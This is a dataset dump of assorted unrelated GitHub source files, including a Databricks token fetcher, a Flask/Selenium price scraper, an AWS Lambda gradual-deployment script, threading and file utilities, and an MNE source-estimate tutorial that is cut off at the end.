['GigabitEthernet0/0/0/0.1224', 'GigabitEthernet0/0/0/0.1424', 'GigabitEthernet0/0/0/0.1225', 'GigabitEthernet0/0/0/0.1525']\nphysical_ifs = []\n\ninterval = 600 # wait time between prediction cycles, seconds\nhidden_units = [72, 36, 18] # 36, 36 is an overkill!\n\n","repo_name":"mikemikhail/ML-anomaly_detection","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"36939617114","text":"#!/usr/bin/env python\n\n#####################################################################################################\n# The basic dictionary of plots which most analyzer produce. #\n# This is used directly in variablesInfo, but can be also imported in each variablesInfo_[ANALYZER] #\n# #\n# Author: A. Mecca (alberto.mecca@cern.ch) #\n#####################################################################################################\n\ndef getVarInfo_VVX(region):\n VarInfo_VVX = {\n \"AAA_cuts\" : {'title':'Cuts', 'text':True, 'unblind':True, 'logy':True, 'ymin':1},\n 'channel_lep':{'title':'lepton flavour', 'text':True, 'unblind':True}\n }\n return VarInfo_VVX\n","repo_name":"bellan/VVXAnalysis","sub_path":"TreeAnalysis/python/variablesInfo_VVX.py","file_name":"variablesInfo_VVX.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"70905274469","text":"import os, requests, json\nfrom base64 import b64encode\n\n\ndef get_databricks_token():\n \"\"\"get databricks token for a service principal\"\"\"\n \n account_id = os.environ.get(\"DATABRICKS_ACCOUNT_ID\")\n client_id = os.environ.get(\"DATABRICKS_CLIENT_ID\")\n client_secret = os.environ.get(\"DATABRICKS_CLIENT_SECRET\")\n\n token_url = f\"https://accounts.cloud.databricks.com/oidc/accounts/{account_id}/v1/token\"\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Authorization\": \"Basic \" + b64encode(f\"{client_id}:{client_secret}\".encode()).decode()\n }\n payload = {\n \"grant_type\": \"client_credentials\",\n \"scope\": \"all-apis\"\n }\n\n response = requests.post(token_url, headers = headers, data = payload)\n response_data = json.loads(response.text)\n if \"access_token\" in response_data:\n print(response_data[\"access_token\"])\n else: print(\"could not get access token....\")\n \n\nif __name__ == \"__main__\":\n get_databricks_token()","repo_name":"robert-altmiller/terraform_template","sub_path":"terraform/python/get_dbricks_token.py","file_name":"get_dbricks_token.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"15382640379","text":"import unittest\nfrom implementation.algorithms.node import Node\nfrom implementation.customer import Customer\n\n\nclass TestNode(unittest.TestCase):\n\n def setUp(self):\n test_customer = Customer(65, 'George', 53.6, 7.0)\n self.test_node = Node(test_customer)\n\n def test_nodes_valid(self):\n test_customer = Customer(65, 'George', 53.6, 7.0)\n self.assertEquals(test_customer, self.test_node.customer)\n\n def test_nodes_invalid(self):\n test_customer = Customer(65, 'Beorge', 53.6, 7.0)\n self.assertEquals(test_customer, self.test_node.customer)\n\n def test_children(self):\n test_customer1 = Customer(66, 'Dude', 53.6, 7.0)\n test_customer2 = Customer(67, 'Dudette', 53.6, 7.0)\n self.test_node.left_child = Node(test_customer1)\n self.test_node.right_child = Node(test_customer2)\n self.assertIsNotNone(self.test_node.left_child)\n self.assertIsNotNone(self.test_node.right_child)\n self.assertIsNot(self.test_node.left_child, self.test_node.right_child)\n","repo_name":"GACiobanita/Customer-Distance-Test","sub_path":"tests/test_node.py","file_name":"test_node.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72961822628","text":"from distutils.log import debug\nfrom flask import Flask, render_template, redirect\nfrom selenium.webdriver.chrome.options import Options\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\napp = Flask(__name__)\n\npicFolder = os.path.join(\"static\",\"pics\")\nstyleFolder = os.path.join(\"static\",\"styles\")\njsFolder = os.path.join(\"static\",\"js\")\n\napp.config[\"UPLOAD_FOLDER\"] = picFolder\napp.config[\"STYLE_FOLDER\"] = styleFolder\napp.config[\"JS_FOLDER\"] = jsFolder\n\ndef reditection():\n return render_template(\"test.html\")\n\n@app.route('/')\ndef index():\n driver = webdriver.Chrome(executable_path=\"chromedriver\",)\n driver.get(\"https://wethenew.com/products/air-jordan-1-high-zoom-air-cmft-easter?variant=39355247558765\")\n acceptCookies = driver.find_element_by_id(\"didomi-notice-agree-button\").click()\n findPrice = driver.find_element_by_xpath('/html/body/div[5]/div/div[2]/div/div/div[1]/div[2]/p[2]/span[2]/span/span')\n priceInner = findPrice.get_attribute(\"innerHTML\")\n jordanOneEasterPrice = priceInner.strip()\n driver.close()\n\n driver = webdriver.Chrome(executable_path=\"chromedriver\")\n driver.get(\"https://wethenew.com/products/adidas-yeezy-boost-350-v2-mono-mist?variant=39410683904109\")\n acceptCookies = driver.find_element_by_id(\"didomi-notice-agree-button\").click()\n #time.sleep(10)\n #webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()\n findPrice = driver.find_element_by_xpath('/html/body/div[5]/div/div[2]/div/div/div[1]/div[2]/p[2]/span[2]/span/span')\n priceInner = findPrice.get_attribute(\"innerHTML\")\n yeezy250MonoMistPrice = priceInner.strip()\n driver.close()\n\n style = os.path.join(app.config[\"STYLE_FOLDER\"], 'style.css')\n js = os.path.join(app.config[\"JS_FOLDER\"], \"app.js\")\n firstPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"slider1.jpg\")\n secondPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"slider2.jpg\")\n thirdPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"slider3.jpg\")\n jordanOneEasterPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"jordanOneEaster.jpg\")\n yeezy350MonoMistPic = os.path.join(app.config[\"UPLOAD_FOLDER\"], \"yeezy350MonoMist.jpg\")\n return render_template(\"index.html\",priceJordan=jordanOneEasterPrice,style=style,sliderImg=firstPic,jordanOneEaster=jordanOneEasterPic,yeezy350MonoMist=yeezy350MonoMistPic,priceYeezy250MonoMist=yeezy250MonoMistPrice,secondSlider=secondPic,thirdSlider=thirdPic,js=js)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"baptisteCanac/wethenewPricesChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"22527788875","text":"import datetime\nfrom typing import List\n\nfrom CollectionsContainer import Collections, CollectionItem\n\n\ndef get_user_cost():\n while True:\n inpt = input(\"Напишите цену предмета:\\n\")\n try:\n return int(inpt)\n except:\n print(\"Неверная цена предмета.\\n\")\n raise Exception\n\n\ndef get_user_date():\n def is_true(text1:str, text2:str, ret):\n inpt = input(text1)\n if inpt.lower() == \"д\":\n return ret\n else:\n inpt = input(text2)\n try:\n return int(inpt)\n except:\n print(\"Не число.\\n\")\n raise Exception\n try:\n now = datetime.datetime.now()\n now = now.replace(\n is_true(\"Год: \" +str(now.year) +\". д/н. \", \"Введите год: \", now.year),\n is_true(\"Месяц: \" +str(now.month) +\". д/н. \", \"Введите месяц: \", now.month),\n is_true(\"День: \" +str(now.day) +\". д/н. \", \"Введите день: \", now.day),\n is_true(\"Час: \" +str(now.hour) +\". д/н. \", \"Введите час: \", now.hour),\n is_true(\"Минута: \" +str(now.minute)+\". д/н. \", \"Введите минуту: \", now.minute),\n is_true(\"Секунда: \" +str(now.second)+\". д/н. \", \"Введите секунду: \", now.second),\n 0)\n return now\n except:\n print(\"Неправильна была введена дата.\\n\")\n raise Exception\n\n\ndef get_user_category(categories: List[str]):\n inpt = input(\"1. Выбрать из сущесвующей категории\\n\"\n \"2. Создать новую категорию\\n\")\n if inpt == \"1\":\n if (len(categories) == 0):\n print(\"Нет категорий для выбора.\")\n raise Exception\n print(f\"Сущестующие категории ({len(categories)}):\\n\")\n for i, item in enumerate(categories):\n print(f\"{i + 1}. {item}\")\n print(\"\")\n\n inpt = input(\"Напишите номер категории: \")\n try:\n num = int(inpt)\n except:\n print(\"Ввод не число.\")\n raise Exception\n if num <= 0 or num > len(categories)+1:\n print(\"Номер больше чем кол-во категорий.\")\n raise Exception\n return categories[num-1]\n elif inpt == \"2\":\n inpt = input(\"Напишите новую категорию: \")\n if inpt in categories or inpt == \"всё\":\n print(\"Уже есть такая категория.\")\n raise Exception\n return inpt\n else:\n print(\"Неверный выбор.\")\n\n\ndef add_item(collection: Collections):\n try:\n name = input(\"Напишите имя предмета:\\n\")\n cost = get_user_cost()\n date = get_user_date()\n category = get_user_category(collection.get_categories())\n\n new_item = CollectionItem(name, cost, date)\n collection.add_to_category(category, new_item)\n except:\n return\n","repo_name":"YurikovSpaceEye/programming_homework","sub_path":"add_item_ui.py","file_name":"add_item_ui.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32511220753","text":"import pymongo\n\nfrom value.strings import *\n\nclient = pymongo.MongoClient(MONGODB_URL)\ndb_sensora = client[SENSORA_]\ncoll_dd_mangalist = db_sensora[DD_MANGALIST_]\ncoll_manga_info = db_sensora[MANGA_INFO_]\ncoll_manga_map = db_sensora[MANGA_MAP_]\n\n","repo_name":"SingSongZepe/sensora","sub_path":"enmap/mongo/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"7780060159","text":"import sys\nimport pygame\nfrom pygame.locals import *\n\nimport state\nimport game\n\n\n\n\nclass Title(state.State):\n #.. the self variable represents the instance of the object itself\n #.. The __init__ method is roughly what represents a constructor in Python. When you call A()\n # Python creates an object for you, and passes it as the first parameter to the __init__ method. \n # Any additional parameters (e.g., A(24, 'Hello')) will also get passed as arguments--in \n # this case causing an exception to be raised, since the constructor isn't expecting them\n def __init__(self):\n self.display = pygame.display.get_surface()\n\n self.background = pygame.image.load('data/images/background_frame3.png')\n self.font_manager = pygame.font.SysFont(\"comicssansms\", 64)\n self.help_font_manager = pygame.font.SysFont(\"comicssansms\", 28)\n self.title_font_manager = pygame.font.SysFont(\"comicssansms\", 104)\n\n self.title = self.title_font_manager.render(\"Color Shooter\", True, (255, 255, 255))\n self.title_rect = pygame.Rect((self.display.get_width() / 2 - self.title.get_width() / 2,\n self.display.get_height() / 2 - self.title.get_height() * 2),\n (self.title.get_width(), self.title.get_height()))\n self.title_color = \"white\"\n self.start_game = self.font_manager.render(\"START\", True, (255, 255, 255))\n self.start_game_rect = pygame.Rect((self.display.get_width() / 2 - self.start_game.get_width() / 2,\n self.display.get_height() / 2 - self.start_game.get_height()),\n (self.start_game.get_width(), self.start_game.get_height()))\n\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.help_rect = pygame.Rect(\n (self.display.get_width() / 2 - self.help.get_width() / 2, self.display.get_height() / 2),\n (self.help.get_width(), self.help.get_height()))\n\n self.help_image = pygame.image.load(\"data/images/instructions.png\").convert_alpha()\n self.help_image_rect = pygame.Rect((self.display.get_width() / 2 - self.help_image.get_width() / 2,\n self.display.get_height() / 2 - self.help_image.get_height() / 2),\n (self.help_image.get_width(), self.help_image.get_height()))\n\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.exit_game_rect = pygame.Rect((self.display.get_width() / 2 - self.exit_game.get_width() / 2,\n self.display.get_height() / 2 + self.exit_game.get_height()),\n (self.exit_game.get_width(), self.exit_game.get_height()))\n\n self.current_choice = 1\n\n self.show_help = False\n\n self.timer = pygame.time.Clock()\n\n self.music = pygame.mixer.Sound(\"data/sound/title_highscore.wav\")\n\n self.music.play(loops=-1)\n def exit(self):\n self.music.stop()\n self.display.blit(self.background, (0, 0))\n pygame.display.flip()\n\n def reason(self):\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_RETURN:\n if self.show_help:\n self.show_help = False\n else:\n if self.current_choice == 1:\n\n return game.Game()\n elif self.current_choice == 2:\n self.show_help = True\n elif self.current_choice == 3:\n pygame.quit()\n sys.exit()\n if event.key == K_DOWN:\n self.next()\n if event.key == K_UP:\n self.previous()\n\n def act(self):\n self.timer.tick(40)\n self.animate_title()\n\n self.display.blit(self.background, (0, 0))\n if self.show_help:\n self.display.blit(self.help_image, self.help_image_rect)\n else:\n self.display.blit(self.title, self.title_rect)\n self.display.blit(self.start_game, self.start_game_rect)\n self.display.blit(self.help, self.help_rect)\n self.display.blit(self.exit_game, self.exit_game_rect)\n\n pygame.display.update()\n\n def next(self):\n if self.current_choice == 1:\n self.start_game = self.font_manager.render(\"START\", True, (254, 4, 2))\n self.help = self.font_manager.render(\"HELP\", True, (255, 255, 255))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.current_choice = 2\n elif self.current_choice == 2:\n self.start_game = self.font_manager.render(\"START\", True, (254, 4, 2))\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (255, 255, 255))\n self.current_choice = 3\n else:\n self.start_game = self.font_manager.render(\"START\", True, (255, 255, 255))\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.current_choice = 1\n\n def previous(self):\n if self.current_choice == 1:\n self.start_game = self.font_manager.render(\"START\", True, (254, 4, 2))\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (255, 255, 255))\n self.current_choice = 3\n elif self.current_choice == 2:\n self.start_game = self.font_manager.render(\"START\", True, (255, 255, 255))\n self.help = self.font_manager.render(\"HELP\", True, (254, 4, 2))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.current_choice = 1\n else:\n self.start_game = self.font_manager.render(\"START\", True, (254, 4, 2))\n self.help = self.font_manager.render(\"HELP\", True, (255, 255, 255))\n self.exit_game = self.font_manager.render(\"EXIT\", True, (254, 4, 2))\n self.current_choice = 2\n\n def animate_title(self):\n if self.title_color == \"white\":\n self.title = self.title_font_manager.render(\"Color Shooter\", True, (254, 4, 2))\n self.title_color = \"red\"\n else:\n self.title = self.title_font_manager.render(\"Color Shooter\", True, (255, 255, 255))\n self.title_color = \"white\"\n\n","repo_name":"louiehernandez95/Color-Shooter-Game","sub_path":"title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":6717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8621255436","text":"from setuptools import setup\n\npackage_name = 'topics'\n\nsetup(\n name=package_name,\n version='1.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='Raúl Lara',\n maintainer_email='raul.lara@upm.es',\n description='Prueba de concepto de los topics de ROS2',\n license='GPL',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n \"emisor = topics.emisor:main\",\n \"receptor = topics.receptor:main\"\n ],\n },\n)\n","repo_name":"laracabrera/robotica","sub_path":"ros2/src/topics/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"} +{"seq_id":"17475675578","text":"import time\nimport boto3\nfrom datetime import datetime, date, timedelta\nimport logging\n\nlog = logging.getLogger('simple')\nlambda_client = None\n\ndef handler(event, context):\n\tinit()\n\tvalidate_input(event)\n\n\tfunc_name = event['function-name']\n\tversion = event['new-version']\n\talias_name = event['alias-name']\n\tsteps = event['steps']\n\tinterval = event['interval']\n\tweight_function = event.get('type', 'linear')\n\thealth_check = event.get('health-check', True)\n\n\tweights = generate_weights(weight_function, steps)\n\tstart_time = time.time()\n\n\tlog.info(\"Calculated alias weight progression: {0}\".format(weights))\n\n\tfor weight in weights:\n\t\tupdate_weight(func_name, alias_name, version, weight)\n\t\tsleep(interval)\n\n\t\tif health_check:\n\t\t\tsuccess = do_health_check(func_name, alias_name, version)\n\t\t\tif not success:\n\t\t\t\trollback(func_name, alias_name)\n\t\t\t\traise Exception(\"Health check failed, exiting\")\n\n\tres = finalize(func_name, alias_name, version)\n\tend_time = time.time()\n\n\tlog.info(\"Alias {0}:{1} is now routing 100% of traffic to version {2}\".format(func_name, alias_name, version))\n\tlog.info(\"Finished after {0}s\".format(round(end_time - start_time, 2)))\n\n\treturn res\n\ndef update_weight(func_name, alias_name, version, next_weight):\n\tlog.info(\"Updating weight of alias {1}:{2} for version {0} to {3}\".format(version, func_name, alias_name, next_weight))\n\tclient = get_lambda_client()\n\n\tweights = {\n\t\tversion : next_weight\n\t}\n\trouting_config = {\n\t\t'AdditionalVersionWeights' : weights\n\t}\n\n\tclient.update_alias(FunctionName=func_name, Name=alias_name, RoutingConfig=routing_config)\n\treturn\n\ndef sleep(sleep_time):\n\ttime.sleep(sleep_time)\n\ndef validate_input(event):\n\tif not 'function-name' in event:\n\t\traise Exception(\"'function-name' is required\")\n\tif not 'new-version' in event:\n\t\traise Exception(\"'new-version' is required\")\n\tif not 'alias-name' in event:\n\t\traise Exception(\"'alias-name' is required\")\n\tif not 'interval' in event:\n\t\traise Exception(\"'interval' is required\")\n\tif not 'steps' in event:\n\t\traise Exception(\"'steps' is required\")\n\ndef do_health_check(func_name, alias_name, version):\n\t# implement custom health checks here (i.e. invoke, cloudwatch alarms, etc)\n\treturn check_errors_in_cloudwatch(func_name, alias_name, version)\n\n# Return False if any error metrics were emitted in the last minute for the function/alias/new version combination\ndef check_errors_in_cloudwatch(func_name, alias_name, new_version):\n\tclient = boto3.client('cloudwatch')\n\n\tfunc_plus_alias = func_name + \":\" + alias_name\n\tnow = datetime.utcnow()\n\tstart_time = now - timedelta(minutes=1)\n\n\tresponse = client.get_metric_statistics(\n\t\tNamespace='AWS/Lambda',\n\t\tMetricName='Errors',\n\t\tDimensions=[\n\t\t\t{\n\t\t\t\t'Name': 'FunctionName',\n\t\t\t\t'Value': func_name\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Name': 'Resource',\n\t\t\t\t'Value': func_plus_alias\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Name': 'ExecutedVersion',\n\t\t\t\t'Value': new_version\n\t\t\t}\n\t\t],\n\t\tStartTime=start_time,\n\t\tEndTime=now,\n\t\tPeriod=60,\n\t\tStatistics=['Sum']\n\t)\n\tdatapoints = response['Datapoints']\n\tfor datapoint in datapoints:\n\t\tif datapoint['Sum'] > 0:\n\t\t\tlog.info(\"Failing health check because error metrics were found for new version: {0}\".format(datapoints))\n\t\t\treturn False\n\n\treturn True\n\ndef rollback(func_name, alias_name):\n\tlog.info(\"Health check failed. Rolling back to original version\")\n\tclient = get_lambda_client()\n\trouting_config = {\n\t\t'AdditionalVersionWeights' : {}\n\t}\n\tclient.update_alias(FunctionName=func_name, Name=alias_name, RoutingConfig=routing_config)\n\tlog.info(\"Alias was successfully rolled back to original version\")\n\treturn\n\n# Set the new version as the primary version and reset the AdditionalVersionWeights\ndef finalize(func_name, alias_name, version):\n\tclient = get_lambda_client()\n\trouting_config = {\n\t\t'AdditionalVersionWeights' : {}\n\t}\n\tres = client.update_alias(FunctionName=func_name, FunctionVersion=version, Name=alias_name, RoutingConfig=routing_config)\n\treturn res\n\ndef generate_weights(type, steps):\n\tif type == \"linear\":\n\t\tvalues = linear(steps)\n\t# implement other functions here\n\telse:\n\t\traise Exception(\"Invalid function type: \" + type)\n\treturn values\n\ndef get_num_points(time, interval):\n\treturn time / interval\n\ndef linear(num_points):\n\tdelta = 1.0 / num_points\n\tprev = 0\n\tvalues = []\n\tfor i in range(0, num_points):\n\t\tval = prev + delta\n\t\tvalues.append(round(val, 2))\n\t\tprev = val\n\treturn values\n\ndef get_lambda_client():\n\tglobal lambda_client\n\tif lambda_client is None:\n\t\tlambda_client = boto3.client('lambda')\n\treturn lambda_client\n\ndef init():\n\tlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\tfor logging_handler in logging.root.handlers:\n\t\tlogging_handler.addFilter(logging.Filter('simple'))\n\ndef main():\n\t# main() is useful for testing locally. not used when run in Lambda\n\ttest_event = {\n\t\t'function-name': \"echo\",\n\t\t 'new-version': \"1\",\n\t\t 'alias-name': \"myalias\",\n\t\t 'steps': 10,\n\t\t 'interval': 5,\n\t\t 'type': \"linear\",\n\t\t 'health-check': True\n\t}\n\tlog.info(handler(test_event, \"\"))\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"aws-samples/aws-lambda-deploy","sub_path":"functions/simple/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"71"} +{"seq_id":"5141256329","text":"import time\nimport random\nimport threading\n\nfrom semaphore import Semaphore\n\n\nclass Ball:\n\n def __init__(self):\n self.time_count = 0\n self.sem = Semaphore()\n\n def get_the_ball(self, thread):\n while(self.time_count < 45):\n self.sem.down(thread) # down\n\n if thread.was_sleeping:\n thread.was_sleeping = False\n else:\n # CRITICAL REGION\n time.sleep(random.randint(1, 2)) # min 1 sec / max 2 sec\n \n # Leave critical region\n self.left_the_ball(thread)\n self.time_count += 1\n \n if not self.sem.is_active() and self.sem.has_someone_sleeping():\n self.sem.up()\n\n def left_the_ball(self, thread):\n print(thread.get_name(), \"left the ball!\")\n self.sem.up() # up\n time.sleep(random.randint(1, 2))\n","repo_name":"vieirafrancisco/algorithms","sub_path":"concurrent_programming/Threads/Semaphore/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"42416812198","text":"__author__ = 'Зелепукин Алексей Юрьевич'\n\nimport os\nimport shutil\n\n# Задача-1:\n# Напишите скрипт, создающий директории dir_1 - dir_9 в папке,\n# из которой запущен данный скрипт.\n# И второй скрипт, удаляющий эти папки.\n\n\ndef make_dir(name):\n path = os.path.join(os.getcwd(), name)\n try:\n os.mkdir(path)\n return True\n except FileExistsError:\n return False\n\n\ndef remove_dir(name):\n path = os.path.join(os.getcwd(), name)\n try:\n os.rmdir(path)\n return True\n except FileExistsError:\n return False\n\n\n# names = ['dir_' + str(i) for i in range(1, 10)]\n# print(os.listdir(os.getcwd()))\n# for name in names:\n# make_dir(name)\n# print(os.listdir(os.getcwd()))\n# for name in names:\n# remove_dir(name)\n# print(os.listdir(os.getcwd()))\n\n# Задача-2:\n# Напишите скрипт, отображающий папки текущей директории.\n\n\ndef list_dir(path=os.getcwd(), mode='d'):\n output_list = []\n content = os.listdir(path)\n if mode == 'a':\n output_list = content\n elif mode == 'd':\n for item in content:\n if os.path.isdir(item):\n output_list.append(item)\n elif mode == 'f':\n for item in content:\n if os.path.isfile(item):\n output_list.append(item)\n else:\n output_list = content\n return output_list\n\n\n# print(list_dir())\n# for name in names:\n# make_dir(name)\n# print(list_dir())\n# for name in names:\n# remove_dir(name)\n# print(list_dir())\n\n# Задача-3:\n# Напишите скрипт, создающий копию файла, из которого запущен данный скрипт.\n\n\ndef copy_file(file_path=os.path.realpath(__file__)):\n i = 1\n file_name = os.path.basename(file_path)\n copy_name = 'copy' + '0' + str(i) + '_' + file_name if i < 10 else 'copy' + str(i) + '_' + file_name\n while os.path.isfile(copy_name):\n i += 1\n copy_name = 'copy' + '0' + str(i) + '_' + file_name if i < 10 else 'copy' + str(i) + '_' + file_name\n else:\n shutil.copy(os.path.join(os.path.dirname(file_path), file_name),\n os.path.join(os.path.dirname(file_path), copy_name))\n return True\n\n\n# copy_file()\n\n\ndef change_dir(path):\n try:\n os.chdir(path)\n return True\n except FileNotFoundError:\n return False\n\n\n","repo_name":"alekseyzelepukin/python_basic","sub_path":"lesson_05/hw05_easy.py","file_name":"hw05_easy.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21886821063","text":"#Trying to get output from the GDAX REST API\n\nimport requests\nimport json\n\n#get a response from GDAX\nprods = requests.get('https://api-public.sandbox.gdax.com/products')\n\n#format response from json to a list of dicts\nprodsdata = json.loads(prods.text)\n\n#for i in range(0, len(prodsdata)):\n #print(\"Entry {0}: {1}\".format(i, prodsdata[i][\"id\"]))\n\nbtcusd = prodsdata[0]\n\nwith open('gdaxproducts.txt', 'w') as f:\n f.write(\"The products offered from the GDAX REST API:\\n\\n\\n\")\n f.write(\"The GDAX REST API offers conversion rates between the following currencies:\\n\")\n for i in range(0, len(prodsdata)):\n f.write(\"{0}\\n\".format(prodsdata[i][\"id\"]))\n f.write(\"\\n\")\n\n f.write(\"For each of these currency pairings, the following attributes are available:\\n\")\n for i in prodsdata[0]:\n f.write(\"{0}\\n\".format(i))\n \n","repo_name":"zackcter/gdax-analytics","sub_path":"prodpop.py","file_name":"prodpop.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19288256845","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nimport mne\nfrom mne import read_evokeds\nfrom mne.datasets import fetch_hcp_mmp_parcellation, sample\nfrom mne.minimum_norm import apply_inverse, read_inverse_operator\n\ndata_path = sample.data_path()\nmeg_path = data_path / \"MEG\" / \"sample\"\nsubjects_dir = data_path / \"subjects\"\n\nfname_evoked = meg_path / \"sample_audvis-ave.fif\"\nfname_stc = meg_path / \"sample_audvis-meg\"\nfetch_hcp_mmp_parcellation(subjects_dir)\n\n# %%\n# Then, we read the stc from file.\nstc = mne.read_source_estimate(fname_stc, subject=\"sample\")\n\n# %%\n# This is a :class:`SourceEstimate ` object.\nprint(stc)\n\n# %%\n# The SourceEstimate object is in fact a *surface* source estimate. MNE also\n# supports volume-based source estimates but more on that later.\n#\n# We can plot the source estimate using the\n# :func:`stc.plot ` just as in other MNE\n# objects. Note that for this visualization to work, you must have ``PyVista``\n# installed on your machine.\ninitial_time = 0.1\nbrain = stc.plot(\n subjects_dir=subjects_dir,\n initial_time=initial_time,\n clim=dict(kind=\"value\", lims=[3, 6, 9]),\n smoothing_steps=7,\n)\n\n# %%\n# You can also morph it to fsaverage and visualize it using a flatmap.\n\n# sphinx_gallery_thumbnail_number = 3\nstc_fs = mne.compute_source_morph(\n stc, \"sample\", \"fsaverage\", subjects_dir, smooth=5, verbose=\"error\"\n).apply(stc)\nbrain = stc_fs.plot(\n subjects_dir=subjects_dir,\n initial_time=initial_time,\n clim=dict(kind=\"value\", lims=[3, 6, 9]),\n surface=\"flat\",\n hemi=\"both\",\n size=(1000, 500),\n smoothing_steps=5,\n time_viewer=False,\n add_data_kwargs=dict(colorbar_kwargs=dict(label_font_size=10)),\n)\n\n# to help orient us, let's add a parcellation (red=auditory, green=motor,\n# blue=visual)\nbrain.add_annotation(\"HCPMMP1_combined\", borders=2)\n\n# You can save a movie like the one on our documentation website with:\n# brain.save_movie(time_dilation=20, tmin=0.05, tmax=0.16,\n# interpolation='linear', framerate=10)\n\n# %%\n# Note that here we used ``initial_time=0.1``, but we can also browse through\n# time using ``time_viewer=True``.\n#\n# In case ``PyVista`` is not available, we also offer a ``matplotlib``\n# backend. Here we use verbose='error' to ignore a warning that not all\n# vertices were used in plotting.\nmpl_fig = stc.plot(\n subjects_dir=subjects_dir,\n initial_time=initial_time,\n backend=\"matplotlib\",\n verbose=\"error\",\n smoothing_steps=7,\n)\n\n# %%\n#\n# Volume Source Estimates\n# -----------------------\n# We can also visualize volume source estimates (used for deep structures).\n#\n# Let us load the sensor-level evoked data. We select the MEG channels\n# to keep things simple.\nevoked = read_evokeds(fname_evoked, condition=0, baseline=(None, 0))\nevoked.pick(picks=\"meg\").crop(0.05, 0.15)\n# this risks aliasing, but these data are very smooth\nevoked.decimate(10, verbose=\"error\")\n\n# %%\n# Then, we can load the precomputed inverse operator from a file.\nfname_inv = meg_path / \"sample_audvis-meg-vol-7-meg-inv.fif\"\ninv = read_inverse_operator(fname_inv)\nsrc = inv[\"src\"]\nmri_head_t = inv[\"mri_head_t\"]\n\n# %%\n# The source estimate is computed using the inverse operator and the\n# sensor-space data.\nsnr = 3.0\nlambda2 = 1.0 / snr**2\nmethod = \"dSPM\" # use dSPM method (could also be MNE or sLORETA)\nstc = apply_inverse(evoked, inv, lambda2, method)\ndel inv\n\n# %%\n# This time, we have a different container\n# (:class:`VolSourceEstimate `) for the source time\n# course.\nprint(stc)\n\n# %%\n# This too comes with a convenient plot method.\nstc.plot(src, subject=\"sample\", subjects_dir=subjects_dir)\n\n# %%\n# For this visualization, ``nilearn`` must be installed.\n# This visualization is interactive. Click on any of the anatomical slices\n# to explore the time series. Clicking on any time point will bring up the\n# corresponding anatomical map.\n#\n# We could visualize the source estimate on a glass brain. Unlike the previous\n# visualization, a glass brain does not show us one slice but what we would\n# see if the brain was transparent like glass, and\n# :term:`maximum intensity projection`) is used:\nstc.plot(src, subject=\"sample\", subjects_dir=subjects_dir, mode=\"glass_brain\")\n\n# %%\n# You can also extract label time courses using volumetric atlases. Here we'll\n# use the built-in ``aparc+aseg.mgz``:\n\nfname_aseg = subjects_dir / \"sample\" / \"mri\" / \"aparc+aseg.mgz\"\nlabel_names = mne.get_volume_labels_from_aseg(fname_aseg)\nlabel_tc = stc.extract_label_time_course(fname_aseg, 